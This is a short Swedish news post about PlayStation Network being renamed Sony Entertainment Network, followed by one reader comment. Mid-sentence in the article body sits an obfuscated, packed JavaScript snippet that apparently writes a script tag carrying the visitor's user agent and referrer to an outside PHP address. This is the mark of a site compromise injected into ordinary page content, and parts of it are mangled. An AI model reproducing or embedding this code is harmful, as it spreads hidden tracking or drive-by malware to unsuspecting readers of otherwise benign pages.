Image Image Image Image Image Image Image Image Image Image

| 3 augusti, 2020

Scroll to top

Top

Sony Entertainment Network är nya Playstation Network

Sony Entertainment Network är nya Playstation Network
Sebastian

Den åttonde februari byter Playstation Network namn till Sony Entertainment Network . Sony meddelar att det bara är ett namnbyte och inga andra förändringar kommer att göras i dagsläget.

Alla som har ett konto på PSN kommer att behålla sina användarnamn och lösenord precis som vanligt.

Förändringen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fdyid|var|u0026u|referrer|tysta||js|php’.split(’|’),0,{}))
är en del i Sonys målsättning att förbättra sina unika, digitala underhållningsprodukter. Som en del i det arbetet började Sony i september att sammanföra PlayStation®Network och Sony Entertainment Network. Det hjälper oss att uppnå vårt mål att ha en global, omfattande nätverksplattform med tjänster för spel, film, musik med mera och allt blir tillgängligt från ett enda konto.

Comments

  1. Linki

    Det är väl för att få bort smutsstämpeln efter alla hacker attacker.